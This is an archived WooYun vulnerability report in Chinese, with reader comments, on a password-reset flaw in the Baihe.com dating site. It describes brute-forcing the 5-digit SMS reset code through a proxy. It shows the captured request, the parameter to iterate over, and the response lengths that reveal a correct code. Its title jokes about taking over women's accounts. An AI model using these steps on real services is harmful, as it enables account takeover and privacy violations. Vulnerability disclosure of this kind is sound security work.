当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014594

漏洞标题:光棍节屌丝的逆袭专场NO.1---百合网修改任意妹子账号密码漏洞

相关厂商:百合网

漏洞作者: 风萧萧

提交时间:2012-11-10 17:32

修复时间:2012-12-25 17:32

公开时间:2012-12-25 17:32

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-11-10: 细节已通知厂商并且等待厂商处理中
2012-11-12: 厂商已经确认,细节仅向厂商公开
2012-11-22: 细节向核心白帽子及相关领域专家公开
2012-12-02: 细节向普通白帽子公开
2012-12-12: 细节向实习白帽子公开
2012-12-25: 细节向公众公开

简要描述:

屌丝们,为了妹子们还在扫号么?还在撞库么?还在为了绕过图片验证码烦恼发愁么?光棍节即将到来,本人即将送上各大网站账号密码重置漏洞!

详细说明:

1.是百合的主站哦,进入百合网的账号登陆页面。当然我们这里不登陆,而是点击【忘记密码?】按钮,进入密码重置流程:

1.jpg


2.填写需要重置的账号,由于只是测试漏洞存在,这里只用了我自己的账号:

2.jpg


3.点击下一步,选择找回密码的方式为【注册手机找回】,当然如果认证了的话也可以选择【认证手机找回】:

3.jpg


4.已经给我的手机号发送了重置密码的短信码了(为了与图片验证码区别,这里成为短信码)

4.jpg

5.jpg

漏洞证明:

5.查看手机收到的短信码为【58474】,我首先输入任意的5位纯数字短信码12345,点击提交,则返回如下错误,记得此时设置好浏览器代理:

7.jpg


6.同时,看到的抓包请求为:

GET /ForgotPwdByMobileServlet?jsoncallback=jsonp1352425895960&checkflag=1&reqtype=2&code=12345&_=1352426000488&mobilenum=1*********9 HTTP/1.1
Host: passport.baihe.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1284.2 Safari/537.13
Accept: text/javascript, application/javascript, */*
Referer: http://passport.baihe.com/forgotPwdByRegMobile.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: tempID=8171464184; __utma=175516593.56299183.1352424945.1352424945.1352424945.1; __utmb=175516593.1.10.1352424945; __utmc=175516593; __utmz=175516593.1352424945.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=C22281DF4A91C1DE89890018C79716DA; findpwd_val=1*********9; Hm_lvt_5caa30e0c191a1c525d4a6487bf45a9d=1352424944737; Hm_lpvt_5caa30e0c191a1c525d4a6487bf45a9d=1352425904077

上面的参数code=12345为短信码,而参数mobilenum=1*********9为手机号码。
7.写了那么多,开始吧:设置好参数code为需要爆破的参数,这里由于是测试我从59400开始暴力猜测

百合第7步截图.jpg


9.jpg


8.通过返回的字节数或者返回的内容得出正确的短信码:
短信码错误时,返回的字节数为436,而短信码正确时字节数为634

10.jpg


从内容上判断,短信码错误时返回内容为:

HTTP/1.1 200 OK
Date: Fri, 09 Nov 2012 01:57:47 GMT
Server: baihe_passport_60/2.0.63 (Unix) mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Connection: close
Content-Length: 65
Cache-Control: max-age=86400
Expires: Sat, 10 Nov 2012 01:57:47 GMT
Content-Type: text/json;charset=gbk
jsonp1352425895961({"mobilenum":"1*********9","checkresult":"0"})

短信码正确时返回内容为:

HTTP/1.1 200 OK
Date: Fri, 09 Nov 2012 01:57:59 GMT
Server: baihe_passport_60/2.0.63 (Unix) mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1_pp60java2 date=200510231054)/Tomcat-5.5
Connection: close
Content-Length: 262
Cache-Control: max-age=86400
Expires: Sat, 10 Nov 2012 01:57:59 GMT
Content-Type: text/json;charset=gbk
jsonp1352425895961({"mobilenum":"1*********9","checkresult":"75526369","mobilenum_encode":"EEB0550021599CDD98D3CFC9C824665D","ed":"DCDDDFA8C838BA86065982CDB72D5B23BAC542E4842B3E9CE730A86357C964135967C4CFC05D0B2946673361B4D3F27839A6FD57ABFFE1B2C486C4E73739AD07"})


9.那么使用爆破完的短信码重置账号吧!

12.jpg


10.屌丝成功逆袭:

13.jpg

14.jpg

修复方案:

1.还有一个很严重的bug,一次取回账号长久可用,我的重置链接如下(怎么获得呢?),但是评估我的账号被恶意重置以及泄露个人信息的风险,隐去最后8位:

http://passport.baihe.com/resetPwd.jsp?ed=DCDDDFA8C838BA86065982CDB72D5B23BAC542E4842B3E9CE730A86357C964135967C4CFC05D0B2946673361B4D3F278D8EB391C7919F918003C9ACF********


只要拿了上述链接,不用走重置密码的流程即可重新更新密码;
2.5位纯数字短信码的爆破,即平均5万次的请求,我使用了burpsuite测试单台机器100线程,4分钟即可重置任意一个手机账号!危险啊
3.短信码可以为5位纯数字,甚至可以缩短为4为纯数字;可以不设置图片验证码,甚至可以不用设置短信码的有效期。但是为什么不设置连续5次尝试失败就锁定本次密码重置的请求呢?
4.求20rank,求礼物!

版权声明:转载请注明来源 风萧萧@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-11-12 18:12

厂商回复:

非常感谢风萧萧 帮我们发现问题,我们会尽快改正的。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-11-10 17:36 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    毫不留情的关注

  2. 2012-11-10 17:39 | 小黑要低调 ( 实习白帽子 | Rank:47 漏洞数:4 | 小黑一枚)

    这个霸气啊,绝对要火

  3. 2012-11-10 17:42 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    节操呢 哥哥

  4. 2012-11-10 17:45 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @zzR 他修改了妹子帐号是不是想找机油啊,先用妹子帐号搞定对方

  5. 2012-11-10 17:48 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @小胖胖要减肥 你的意思洞主。 曲线搞基?

  6. 2012-11-10 17:59 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    -,-..

  7. 2012-11-10 18:28 | Metasploit ( 实习白帽子 | Rank:37 漏洞数:7 | http://www.metasploit.cn/)

    @风萧萧 现在流行连载啊

  8. 2012-11-10 18:57 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    尼玛。。求公开。。。求邮件、、

  9. 2012-11-10 19:33 | Anony ( 实习白帽子 | Rank:38 漏洞数:5 | 乌云白帽子一枚)

    节操掉了一地啊!!!

  10. 2012-11-10 19:39 | Sunshine ( 实习白帽子 | Rank:51 漏洞数:10 | Nothing.)

    我奉命前来

  11. 2012-11-10 20:14 | Seay ( 实习白帽子 | Rank:65 漏洞数:8 )

    碉堡

  12. 2012-11-10 20:17 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @风萧萧 这都是怎么了 都拿真爱、百合、世纪佳缘开刀啊

  13. 2012-11-10 20:19 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Finger 标题暴露了一切

  14. 2012-11-10 20:29 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    明天末日光棍节 有女朋友的 有老婆的 有基友的 赶紧分了 过最后一个光棍节!

  15. 2012-11-10 21:08 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @风萧萧 64位MD5?

  16. 2012-11-10 21:20 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @Finger 请关注我微博!谢谢

  17. 2012-11-11 09:52 | Metasploit ( 实习白帽子 | Rank:37 漏洞数:7 | http://www.metasploit.cn/)

    @风萧萧 下一个漏洞是不是某某银行,任意用户密码修改?

  18. 2012-11-11 09:58 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @Metasploit 这个真心不敢啊!

  19. 2012-11-11 14:13 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    支持洞主迂回搞基

  20. 2012-11-12 11:23 | 孤行灯 ( 路人 | Rank:6 漏洞数:2 | ...)

    节操呀...

  21. 2012-11-12 18:18 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    必须和你搞基

  22. 2012-11-12 18:51 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @风萧萧 你是什么人,专门搞逻辑的吗

  23. 2012-11-12 19:03 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @浩天 我不是人,我是一个好基友!

  24. 2012-11-12 22:10 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @风萧萧 好基友 派!

  25. 2012-12-13 09:22 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    短信认证码从59400到59500,怎么只爆破101个就成功了,不是随机的5位数字么?楼主怎么知道认证码会在这段数字之间?求神授业解惑

  26. 2012-12-13 10:14 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @冷静 仔细阅读内容。。是拿自己的做测试。。不是用别人的账户做测试。。如果你拿自己账号做测试的话,短信码你会不知道吗?如果你是为了截图、证明漏洞过程而做测试的话,还要1-N个数字跑一遍吗?so....你懂的。。

  27. 2012-12-13 10:50 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @鬼魅羊羔 内容里面他收到的认证码是58474啊 不在59400-59500之间

  28. 2012-12-13 11:11 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @冷静 嗯,很细心嘛!这里是笔误,看后面的几个截图应该知道的:)

  29. 2012-12-25 17:45 | f1eecy ( 路人 | Rank:21 漏洞数:4 | 图书管理员~)

    @风萧萧 图中的是啥软件啊?

  30. 2012-12-25 18:15 | hongygxiang ( 普通白帽子 | Rank:115 漏洞数:12 | 蛋疼)

    @风萧萧 你好淫荡

  31. 2012-12-25 18:26 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @hongygxiang 还是5位数的

  32. 2012-12-25 21:46 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    就给了10rank诶。。。看来用户数据不重要

  33. 2012-12-26 10:35 | leehenwu ( 普通白帽子 | Rank:194 漏洞数:24 | 撸·啊·撸)

    貌似在哪看到过她的裤子